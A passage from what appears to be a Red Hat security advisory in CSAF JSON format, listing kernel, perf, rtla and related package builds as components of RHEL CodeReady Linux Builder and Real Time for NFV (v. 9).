"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-libs-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-tools-libs-devel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-uki-virt-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-uki-virt-addons-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-devel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-devel-matched-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-modules-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-modules-core-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-zfcpdump-modules-extra-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:libperf-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "libperf-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "libperf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:perf-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "perf-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:python3-perf-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "python3-perf-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "python3-perf-debuginfo-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rtla-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rtla-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "rtla-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rv-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux CodeReady Linux Builder (v. 9)",
"product_id": "CRB-9.7.0.Z.MAIN:rv-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "rv-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "CRB-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.ppc64le as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.ppc64le"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.ppc64le",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.s390x as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.s390x"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.s390x",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.src as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.src"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.src",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-0:5.14.0-611.35.1.el9_7.x86_64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-0:5.14.0-611.35.1.el9_7.x86_64"
},
"product_reference": "kernel-0:5.14.0-611.35.1.el9_7.x86_64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-core-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-debuginfo-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-devel-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-devel-matched-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-modules-0:5.14.0-611.35.1.el9_7.aarch64",
"relates_to_product_reference": "NFV-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64 as a component of Red Hat Enterprise Linux Real Time for NFV (v. 9)",
"product_id": "NFV-9.7.0.Z.MAIN:kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64"
},
"product_reference": "kernel-64k-debug-modules-core-0:5.14.0-611.35.1.el9_7.aarch64",
